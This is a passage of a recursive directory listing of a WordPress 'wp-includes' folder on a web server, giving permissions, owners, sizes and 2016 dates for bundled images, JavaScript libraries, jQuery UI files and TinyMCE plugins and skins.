-rw-r--r-- 1 root root  348 Jun  3  2016 icon_mrgreen.gif
-rw-r--r-- 1 root root  167 Jun  3  2016 icon_neutral.gif
-rw-r--r-- 1 root root  247 Jun  3  2016 icon_question.gif
-rw-r--r-- 1 root root  175 Jun  3  2016 icon_razz.gif
-rw-r--r-- 1 root root  650 Jun  3  2016 icon_redface.gif
-rw-r--r-- 1 root root  489 Jun  3  2016 icon_rolleyes.gif
-rw-r--r-- 1 root root  167 Jun  3  2016 icon_sad.gif
-rw-r--r-- 1 root root  173 Jun  3  2016 icon_smile.gif
-rw-r--r-- 1 root root  174 Jun  3  2016 icon_surprised.gif
-rw-r--r-- 1 root root  241 Jun  3  2016 icon_twisted.gif
-rw-r--r-- 1 root root  168 Jun  3  2016 icon_wink.gif
-rw-r--r-- 1 root root 1.5K Jun  3  2016 mrgreen.png
-rw-r--r-- 1 root root 1.3K Jun  3  2016 rolleyes.png
-rw-r--r-- 1 root root 1008 Jun  3  2016 simple-smile.png

/var/www/https/blogblog/wp-includes/images/wlw:
total 20K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 6 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 1.4K Jun  3  2016 wp-comments.png
-rw-r--r-- 1 root root  664 Jun  3  2016 wp-icon.png
-rw-r--r-- 1 root root 2.4K Jun  3  2016 wp-watermark.png

/var/www/https/blogblog/wp-includes/js:
total 1.9M
drwxr-xr-x 11 root root 4.0K Jun  3  2016 .
drwxr-xr-x 12 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root  12K Jun  3  2016 admin-bar.js
-rw-r--r--  1 root root 6.9K Jun  3  2016 admin-bar.min.js
-rw-r--r--  1 root root  16K Jun  3  2016 autosave.js
-rw-r--r--  1 root root 5.6K Jun  3  2016 autosave.min.js
-rw-r--r--  1 root root  20K Jun  3  2016 backbone.min.js
-rw-r--r--  1 root root  29K Jun  3  2016 colorpicker.js
-rw-r--r--  1 root root  17K Jun  3  2016 colorpicker.min.js
-rw-r--r--  1 root root 1.2K Jun  3  2016 comment-reply.js
-rw-r--r--  1 root root  757 Jun  3  2016 comment-reply.min.js
drwxr-xr-x  2 root root 4.0K Jun  3  2016 crop
-rw-r--r--  1 root root  17K Jun  3  2016 customize-base.js
-rw-r--r--  1 root root 6.9K Jun  3  2016 customize-base.min.js
-rw-r--r--  1 root root 6.6K Jun  3  2016 customize-loader.js
-rw-r--r--  1 root root 3.2K Jun  3  2016 customize-loader.min.js
-rw-r--r--  1 root root 5.8K Jun  3  2016 customize-models.js
-rw-r--r--  1 root root 3.4K Jun  3  2016 customize-models.min.js
-rw-r--r--  1 root root 4.4K Jun  3  2016 customize-preview.js
-rw-r--r--  1 root root 2.4K Jun  3  2016 customize-preview.min.js
-rw-r--r--  1 root root 3.4K Jun  3  2016 customize-preview-widgets.js
-rw-r--r--  1 root root 1.7K Jun  3  2016 customize-preview-widgets.min.js
-rw-r--r--  1 root root 5.4K Jun  3  2016 customize-views.js
-rw-r--r--  1 root root 3.0K Jun  3  2016 customize-views.min.js
-rw-r--r--  1 root root  20K Jun  3  2016 heartbeat.js
-rw-r--r--  1 root root 5.4K Jun  3  2016 heartbeat.min.js
-rw-r--r--  1 root root 4.9K Jun  3  2016 hoverIntent.js
-rw-r--r--  1 root root 1.1K Jun  3  2016 hoverIntent.min.js
drwxr-xr-x  2 root root 4.0K Jun  3  2016 imgareaselect
drwxr-xr-x  2 root root 4.0K Jun  3  2016 jcrop
drwxr-xr-x  3 root root 4.0K Jun  3  2016 jquery
-rw-r--r--  1 root root  18K Jun  3  2016 json2.js
-rw-r--r--  1 root root 2.9K Jun  3  2016 json2.min.js
-rw-r--r--  1 root root  32K Jun  3  2016 masonry.min.js
-rw-r--r--  1 root root  23K Jun  3  2016 mce-view.js
-rw-r--r--  1 root root 8.5K Jun  3  2016 mce-view.min.js
-rw-r--r--  1 root root  23K Jun  3  2016 media-audiovideo.js
-rw-r--r--  1 root root  13K Jun  3  2016 media-audiovideo.min.js
-rw-r--r--  1 root root  30K Jun  3  2016 media-editor.js
-rw-r--r--  1 root root  11K Jun  3  2016 media-editor.min.js
drwxr-xr-x  2 root root 4.0K Jun  3  2016 mediaelement
-rw-r--r--  1 root root  24K Jun  3  2016 media-grid.js
-rw-r--r--  1 root root  13K Jun  3  2016 media-grid.min.js
-rw-r--r--  1 root root  41K Jun  3  2016 media-models.js
-rw-r--r--  1 root root  14K Jun  3  2016 media-models.min.js
-rw-r--r--  1 root root 220K Jun  3  2016 media-views.js
-rw-r--r--  1 root root  99K Jun  3  2016 media-views.min.js
drwxr-xr-x  2 root root 4.0K Jun  3  2016 plupload
-rw-r--r--  1 root root  20K Jun  3  2016 quicktags.js
-rw-r--r--  1 root root 9.5K Jun  3  2016 quicktags.min.js
-rw-r--r--  1 root root  11K Jun  3  2016 shortcode.js
-rw-r--r--  1 root root 2.6K Jun  3  2016 shortcode.min.js
-rw-r--r--  1 root root  10K Jun  3  2016 swfobject.js
drwxr-xr-x  3 root root 4.0K Jun  3  2016 swfupload
drwxr-xr-x  2 root root 4.0K Jun  3  2016 thickbox
drwxr-xr-x  7 root root 4.0K Jun  3  2016 tinymce
-rw-r--r--  1 root root  30K Jun  3  2016 twemoji.js
-rw-r--r--  1 root root  13K Jun  3  2016 twemoji.min.js
-rw-r--r--  1 root root 4.9K Jun  3  2016 tw-sack.js
-rw-r--r--  1 root root 3.2K Jun  3  2016 tw-sack.min.js
-rw-r--r--  1 root root  15K Jun  3  2016 underscore.min.js
-rw-r--r--  1 root root 4.5K Jun  3  2016 utils.js
-rw-r--r--  1 root root 1.8K Jun  3  2016 utils.min.js
-rw-r--r--  1 root root  832 Jun  3  2016 wp-a11y.js
-rw-r--r--  1 root root  376 Jun  3  2016 wp-a11y.min.js
-rw-r--r--  1 root root 3.1K Jun  3  2016 wp-ajax-response.js
-rw-r--r--  1 root root 2.1K Jun  3  2016 wp-ajax-response.min.js
-rw-r--r--  1 root root 3.1K Jun  3  2016 wp-auth-check.js
-rw-r--r--  1 root root 1.7K Jun  3  2016 wp-auth-check.min.js
-rw-r--r--  1 root root  11K Jun  3  2016 wp-backbone.js
-rw-r--r--  1 root root 3.0K Jun  3  2016 wp-backbone.min.js
-rw-r--r--  1 root root  435 Jun  3  2016 wpdialog.js
-rw-r--r--  1 root root  237 Jun  3  2016 wpdialog.min.js
-rw-r--r--  1 root root 3.9K Jun  3  2016 wp-emoji.js
-rw-r--r--  1 root root 2.5K Jun  3  2016 wp-emoji-loader.js
-rw-r--r--  1 root root  714 Jun  3  2016 wp-emoji-loader.min.js
-rw-r--r--  1 root root 1.4K Jun  3  2016 wp-emoji.min.js
-rw-r--r--  1 root root  15K Jun  3  2016 wp-emoji-release.min.js
-rw-r--r--  1 root root  18K Jun  3  2016 wplink.js
-rw-r--r--  1 root root  11K Jun  3  2016 wplink.min.js
-rw-r--r--  1 root root  914 Jun  3  2016 wp-list-revisions.js
-rw-r--r--  1 root root  571 Jun  3  2016 wp-list-revisions.min.js
-rw-r--r--  1 root root  11K Jun  3  2016 wp-lists.js
-rw-r--r--  1 root root 7.2K Jun  3  2016 wp-lists.min.js
-rw-r--r--  1 root root 6.5K Jun  3  2016 wp-pointer.js
-rw-r--r--  1 root root 3.6K Jun  3  2016 wp-pointer.min.js
-rw-r--r--  1 root root 3.4K Jun  3  2016 wp-util.js
-rw-r--r--  1 root root  981 Jun  3  2016 wp-util.min.js
-rw-r--r--  1 root root  502 Jun  3  2016 zxcvbn-async.js
-rw-r--r--  1 root root  324 Jun  3  2016 zxcvbn-async.min.js
-rw-r--r--  1 root root 683K Jun  3  2016 zxcvbn.min.js

/var/www/https/blogblog/wp-includes/js/crop:
total 40K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 11 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 2.9K Jun  3  2016 cropper.css
-rw-r--r--  1 root root  17K Jun  3  2016 cropper.js
-rw-r--r--  1 root root  277 Jun  3  2016 marqueeHoriz.gif
-rw-r--r--  1 root root  293 Jun  3  2016 marqueeVert.gif

/var/www/https/blogblog/wp-includes/js/imgareaselect:
total 76K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 11 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root  178 Jun  3  2016 border-anim-h.gif
-rw-r--r--  1 root root  178 Jun  3  2016 border-anim-v.gif
-rw-r--r--  1 root root  790 Jun  3  2016 imgareaselect.css
-rw-r--r--  1 root root  37K Jun  3  2016 jquery.imgareaselect.js
-rw-r--r--  1 root root  14K Jun  3  2016 jquery.imgareaselect.min.js

/var/www/https/blogblog/wp-includes/js/jcrop:
total 32K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 11 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root  323 Jun  3  2016 Jcrop.gif
-rw-r--r--  1 root root 2.1K Jun  3  2016 jquery.Jcrop.min.css
-rw-r--r--  1 root root  16K Jun  3  2016 jquery.Jcrop.min.js

/var/www/https/blogblog/wp-includes/js/jquery:
total 260K
drwxr-xr-x  3 root root 4.0K Jun  3  2016 .
drwxr-xr-x 11 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 9.1K Jun  3  2016 jquery.color.min.js
-rw-r--r--  1 root root  41K Jun  3  2016 jquery.form.js
-rw-r--r--  1 root root  15K Jun  3  2016 jquery.form.min.js
-rw-r--r--  1 root root 5.5K Jun  3  2016 jquery.hotkeys.js
-rw-r--r--  1 root root 1.8K Jun  3  2016 jquery.hotkeys.min.js
-rw-r--r--  1 root root  94K Jun  3  2016 jquery.js
-rw-r--r--  1 root root 1.8K Jun  3  2016 jquery.masonry.min.js
-rw-r--r--  1 root root  17K Jun  3  2016 jquery-migrate.js
-rw-r--r--  1 root root 7.1K Jun  3  2016 jquery-migrate.min.js
-rw-r--r--  1 root root 3.7K Jun  3  2016 jquery.query.js
-rw-r--r--  1 root root 3.4K Jun  3  2016 jquery.schedule.js
-rw-r--r--  1 root root  783 Jun  3  2016 jquery.serialize-object.js
-rw-r--r--  1 root root 3.7K Jun  3  2016 jquery.table-hotkeys.js
-rw-r--r--  1 root root 2.3K Jun  3  2016 jquery.table-hotkeys.min.js
-rw-r--r--  1 root root 1.2K Jun  3  2016 jquery.ui.touch-punch.js
-rw-r--r--  1 root root 6.9K Jun  3  2016 suggest.js
-rw-r--r--  1 root root 2.9K Jun  3  2016 suggest.min.js
drwxr-xr-x  2 root root 4.0K Jun  3  2016 ui

/var/www/https/blogblog/wp-includes/js/jquery/ui:
total 340K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 3 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 8.4K Jun  3  2016 accordion.min.js
-rw-r--r-- 1 root root 8.1K Jun  3  2016 autocomplete.min.js
-rw-r--r-- 1 root root 7.1K Jun  3  2016 button.min.js
-rw-r--r-- 1 root root 4.0K Jun  3  2016 core.min.js
-rw-r--r-- 1 root root  36K Jun  3  2016 datepicker.min.js
-rw-r--r-- 1 root root  12K Jun  3  2016 dialog.min.js
-rw-r--r-- 1 root root  19K Jun  3  2016 draggable.min.js
-rw-r--r-- 1 root root 6.2K Jun  3  2016 droppable.min.js
-rw-r--r-- 1 root root 1.2K Jun  3  2016 effect-blind.min.js
-rw-r--r-- 1 root root 1.3K Jun  3  2016 effect-bounce.min.js
-rw-r--r-- 1 root root  918 Jun  3  2016 effect-clip.min.js
-rw-r--r-- 1 root root  997 Jun  3  2016 effect-drop.min.js
-rw-r--r-- 1 root root 1.2K Jun  3  2016 effect-explode.min.js
-rw-r--r-- 1 root root  515 Jun  3  2016 effect-fade.min.js
-rw-r--r-- 1 root root 1.1K Jun  3  2016 effect-fold.min.js
-rw-r--r-- 1 root root  789 Jun  3  2016 effect-highlight.min.js
-rw-r--r-- 1 root root  14K Jun  3  2016 effect.min.js
-rw-r--r-- 1 root root  783 Jun  3  2016 effect-puff.min.js
-rw-r--r-- 1 root root  800 Jun  3  2016 effect-pulsate.min.js
-rw-r--r-- 1 root root 1.1K Jun  3  2016 effect-scale.min.js
-rw-r--r-- 1 root root 1.1K Jun  3  2016 effect-shake.min.js
-rw-r--r-- 1 root root 3.3K Jun  3  2016 effect-size.min.js
-rw-r--r-- 1 root root  962 Jun  3  2016 effect-slide.min.js
-rw-r--r-- 1 root root  857 Jun  3  2016 effect-transfer.min.js
-rw-r--r-- 1 root root 9.4K Jun  3  2016 menu.min.js
-rw-r--r-- 1 root root 3.1K Jun  3  2016 mouse.min.js
-rw-r--r-- 1 root root 6.4K Jun  3  2016 position.min.js
-rw-r--r-- 1 root root 2.5K Jun  3  2016 progressbar.min.js
-rw-r--r-- 1 root root  18K Jun  3  2016 resizable.min.js
-rw-r--r-- 1 root root 4.2K Jun  3  2016 selectable.min.js
-rw-r--r-- 1 root root 8.2K Jun  3  2016 selectmenu.min.js
-rw-r--r-- 1 root root  11K Jun  3  2016 slider.min.js
-rw-r--r-- 1 root root  25K Jun  3  2016 sortable.min.js
-rw-r--r-- 1 root root 7.0K Jun  3  2016 spinner.min.js
-rw-r--r-- 1 root root  12K Jun  3  2016 tabs.min.js
-rw-r--r-- 1 root root 5.6K Jun  3  2016 tooltip.min.js
-rw-r--r-- 1 root root 6.8K Jun  3  2016 widget.min.js

/var/www/https/blogblog/wp-includes/js/mediaelement:
total 248K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 11 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root  166 Jun  3  2016 background.png
-rw-r--r--  1 root root 3.0K Jun  3  2016 bigplay.png
-rw-r--r--  1 root root 1.1K Jun  3  2016 bigplay.svg
-rw-r--r--  1 root root 1.9K Jun  3  2016 controls.png
-rw-r--r--  1 root root  11K Jun  3  2016 controls.svg
-rw-r--r--  1 root root  58K Jun  3  2016 flashmediaelement.swf
-rw-r--r--  1 root root 1.8K Jun  3  2016 froogaloop.min.js
-rw-r--r--  1 root root 6.1K Jun  3  2016 loading.gif
-rw-r--r--  1 root root  76K Jun  3  2016 mediaelement-and-player.min.js
-rw-r--r--  1 root root  20K Jun  3  2016 mediaelementplayer.min.css
-rw-r--r--  1 root root  13K Jun  3  2016 silverlightmediaelement.xap
-rw-r--r--  1 root root 4.2K Jun  3  2016 skipback.png
-rw-r--r--  1 root root 5.1K Jun  3  2016 wp-mediaelement.css
-rw-r--r--  1 root root  926 Jun  3  2016 wp-mediaelement.js
-rw-r--r--  1 root root 4.7K Jun  3  2016 wp-playlist.js

/var/www/https/blogblog/wp-includes/js/plupload:
total 284K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 11 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root  16K Jun  3  2016 handlers.js
-rw-r--r--  1 root root  11K Jun  3  2016 handlers.min.js
-rw-r--r--  1 root root  18K Jun  3  2016 license.txt
-rw-r--r--  1 root root  29K Jun  3  2016 plupload.flash.swf
-rw-r--r--  1 root root 106K Jun  3  2016 plupload.full.min.js
-rw-r--r--  1 root root  62K Jun  3  2016 plupload.silverlight.xap
-rw-r--r--  1 root root  13K Jun  3  2016 wp-plupload.js
-rw-r--r--  1 root root 4.8K Jun  3  2016 wp-plupload.min.js

/var/www/https/blogblog/wp-includes/js/swfupload:
total 100K
drwxr-xr-x  3 root root 4.0K Jun  3  2016 .
drwxr-xr-x 11 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root  13K Jun  3  2016 handlers.js
-rw-r--r--  1 root root 8.7K Jun  3  2016 handlers.min.js
-rw-r--r--  1 root root 1.6K Jun  3  2016 license.txt
drwxr-xr-x  2 root root 4.0K Jun  3  2016 plugins
-rw-r--r--  1 root root  37K Jun  3  2016 swfupload.js
-rw-r--r--  1 root root  13K Jun  3  2016 swfupload.swf

/var/www/https/blogblog/wp-includes/js/swfupload/plugins:
total 32K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 3 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 1.6K Jun  3  2016 swfupload.cookies.js
-rw-r--r-- 1 root root 3.4K Jun  3  2016 swfupload.queue.js
-rw-r--r-- 1 root root  12K Jun  3  2016 swfupload.speed.js
-rw-r--r-- 1 root root 3.9K Jun  3  2016 swfupload.swfobject.js

/var/www/https/blogblog/wp-includes/js/thickbox:
total 44K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 11 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root  15K Jun  3  2016 loadingAnimation.gif
-rw-r--r--  1 root root   94 Jun  3  2016 macFFBgHack.png
-rw-r--r--  1 root root 2.1K Jun  3  2016 thickbox.css
-rw-r--r--  1 root root  12K Jun  3  2016 thickbox.js

/var/www/https/blogblog/wp-includes/js/tinymce:
total 524K
drwxr-xr-x  7 root root 4.0K Jun  3  2016 .
drwxr-xr-x 11 root root 4.0K Jun  3  2016 ..
drwxr-xr-x  2 root root 4.0K Jun  3  2016 langs
-rw-r--r--  1 root root  26K Jun  3  2016 license.txt
drwxr-xr-x 23 root root 4.0K Jun  3  2016 plugins
drwxr-xr-x  4 root root 4.0K Jun  3  2016 skins
drwxr-xr-x  3 root root 4.0K Jun  3  2016 themes
-rw-r--r--  1 root root 301K Jun  3  2016 tinymce.min.js
-rw-r--r--  1 root root  15K Jun  3  2016 tiny_mce_popup.js
drwxr-xr-x  2 root root 4.0K Jun  3  2016 utils
-rw-r--r--  1 root root 4.7K Jun  3  2016 wp-mce-help.php
-rw-r--r--  1 root root 136K Jun  3  2016 wp-tinymce.js.gz
-rw-r--r--  1 root root 1.1K Jun  3  2016 wp-tinymce.php

/var/www/https/blogblog/wp-includes/js/tinymce/langs:
total 24K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 7 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  16K Jun  3  2016 wp-langs-en.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins:
total 92K
drwxr-xr-x 23 root root 4.0K Jun  3  2016 .
drwxr-xr-x  7 root root 4.0K Jun  3  2016 ..
drwxr-xr-x  2 root root 4.0K Jun  3  2016 charmap
drwxr-xr-x  2 root root 4.0K Jun  3  2016 colorpicker
drwxr-xr-x  3 root root 4.0K Jun  3  2016 compat3x
drwxr-xr-x  2 root root 4.0K Jun  3  2016 directionality
drwxr-xr-x  2 root root 4.0K Jun  3  2016 fullscreen
drwxr-xr-x  2 root root 4.0K Jun  3  2016 hr
drwxr-xr-x  2 root root 4.0K Jun  3  2016 image
drwxr-xr-x  2 root root 4.0K Jun  3  2016 lists
drwxr-xr-x  2 root root 4.0K Jun  3  2016 media
drwxr-xr-x  2 root root 4.0K Jun  3  2016 paste
drwxr-xr-x  2 root root 4.0K Jun  3  2016 tabfocus
drwxr-xr-x  2 root root 4.0K Jun  3  2016 textcolor
drwxr-xr-x  2 root root 4.0K Jun  3  2016 wordpress
drwxr-xr-x  2 root root 4.0K Jun  3  2016 wpautoresize
drwxr-xr-x  2 root root 4.0K Jun  3  2016 wpdialogs
drwxr-xr-x  2 root root 4.0K Jun  3  2016 wpeditimage
drwxr-xr-x  2 root root 4.0K Jun  3  2016 wpemoji
drwxr-xr-x  2 root root 4.0K Jun  3  2016 wpfullscreen
drwxr-xr-x  2 root root 4.0K Jun  3  2016 wpgallery
drwxr-xr-x  2 root root 4.0K Jun  3  2016 wplink
drwxr-xr-x  2 root root 4.0K Jun  3  2016 wpview

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/charmap:
total 28K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 9.6K Jun  3  2016 plugin.js
-rw-r--r--  1 root root 7.3K Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/colorpicker:
total 16K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 2.4K Jun  3  2016 plugin.js
-rw-r--r--  1 root root 1.2K Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/compat3x:
total 28K
drwxr-xr-x  3 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
drwxr-xr-x  2 root root 4.0K Jun  3  2016 css
-rw-r--r--  1 root root 8.1K Jun  3  2016 plugin.js
-rw-r--r--  1 root root 3.9K Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/compat3x/css:
total 16K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 3 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 7.9K Jun  3  2016 dialog.css

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/directionality:
total 16K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 1.5K Jun  3  2016 plugin.js
-rw-r--r--  1 root root  726 Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/fullscreen:
total 16K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 3.2K Jun  3  2016 plugin.js
-rw-r--r--  1 root root 1.6K Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/hr:
total 16K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root  624 Jun  3  2016 plugin.js
-rw-r--r--  1 root root  322 Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/image:
total 32K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root  14K Jun  3  2016 plugin.js
-rw-r--r--  1 root root 7.1K Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/lists:
total 36K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root  19K Jun  3  2016 plugin.js
-rw-r--r--  1 root root 8.0K Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/media:
total 60K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root  20K Jun  3  2016 moxieplayer.swf
-rw-r--r--  1 root root  19K Jun  3  2016 plugin.js
-rw-r--r--  1 root root 9.8K Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/paste:
total 72K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root  45K Jun  3  2016 plugin.js
-rw-r--r--  1 root root  15K Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/tabfocus:
total 16K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 2.5K Jun  3  2016 plugin.js
-rw-r--r--  1 root root 1.3K Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/textcolor:
total 20K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 6.5K Jun  3  2016 plugin.js
-rw-r--r--  1 root root 3.8K Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/wordpress:
total 40K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root  20K Jun  3  2016 plugin.js
-rw-r--r--  1 root root  11K Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/wpautoresize:
total 20K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 5.9K Jun  3  2016 plugin.js
-rw-r--r--  1 root root 2.4K Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/wpdialogs:
total 16K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 2.4K Jun  3  2016 plugin.js
-rw-r--r--  1 root root 1.4K Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/wpeditimage:
total 52K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root  27K Jun  3  2016 plugin.js
-rw-r--r--  1 root root  14K Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/wpemoji:
total 16K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 3.5K Jun  3  2016 plugin.js
-rw-r--r--  1 root root 1.6K Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/wpfullscreen:
total 16K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 2.0K Jun  3  2016 plugin.js
-rw-r--r--  1 root root  990 Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/wpgallery:
total 16K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 3.1K Jun  3  2016 plugin.js
-rw-r--r--  1 root root 1.7K Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/wplink:
total 16K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 1.2K Jun  3  2016 plugin.js
-rw-r--r--  1 root root  750 Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/plugins/wpview:
total 40K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 23 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root  20K Jun  3  2016 plugin.js
-rw-r--r--  1 root root 8.3K Jun  3  2016 plugin.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/skins:
total 16K
drwxr-xr-x 4 root root 4.0K Jun  3  2016 .
drwxr-xr-x 7 root root 4.0K Jun  3  2016 ..
drwxr-xr-x 4 root root 4.0K Jun  3  2016 lightgray
drwxr-xr-x 3 root root 4.0K Jun  3  2016 wordpress

/var/www/https/blogblog/wp-includes/js/tinymce/skins/lightgray:
total 96K
drwxr-xr-x 4 root root 4.0K Jun  3  2016 .
drwxr-xr-x 4 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 1.1K Jun  3  2016 content.inline.min.css
-rw-r--r-- 1 root root 1.5K Jun  3  2016 content.min.css
drwxr-xr-x 2 root root 4.0K Jun  3  2016 fonts
drwxr-xr-x 2 root root 4.0K Jun  3  2016 img
-rw-r--r-- 1 root root  35K Jun  3  2016 skin.ie7.min.css
-rw-r--r-- 1 root root  34K Jun  3  2016 skin.min.css

/var/www/https/blogblog/wp-includes/js/tinymce/skins/lightgray/fonts:
total 132K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 4 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root   67 Jun  3  2016 readme.md
-rw-r--r-- 1 root root 8.8K Jun  3  2016 tinymce.eot
-rw-r--r-- 1 root root 8.9K Jun  3  2016 tinymce-small.eot
-rw-r--r-- 1 root root  22K Jun  3  2016 tinymce-small.svg
-rw-r--r-- 1 root root 8.8K Jun  3  2016 tinymce-small.ttf
-rw-r--r-- 1 root root 8.8K Jun  3  2016 tinymce-small.woff
-rw-r--r-- 1 root root  22K Jun  3  2016 tinymce.svg
-rw-r--r-- 1 root root 8.7K Jun  3  2016 tinymce.ttf
-rw-r--r-- 1 root root 8.8K Jun  3  2016 tinymce.woff

/var/www/https/blogblog/wp-includes/js/tinymce/skins/lightgray/img:
total 24K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 4 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root   53 Jun  3  2016 anchor.gif
-rw-r--r-- 1 root root 2.6K Jun  3  2016 loader.gif
-rw-r--r-- 1 root root  152 Jun  3  2016 object.gif
-rw-r--r-- 1 root root   43 Jun  3  2016 trans.gif

/var/www/https/blogblog/wp-includes/js/tinymce/skins/wordpress:
total 24K
drwxr-xr-x 3 root root 4.0K Jun  3  2016 .
drwxr-xr-x 4 root root 4.0K Jun  3  2016 ..
drwxr-xr-x 2 root root 4.0K Jun  3  2016 images
-rw-r--r-- 1 root root 9.2K Jun  3  2016 wp-content.css

/var/www/https/blogblog/wp-includes/js/tinymce/skins/wordpress/images:
total 64K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
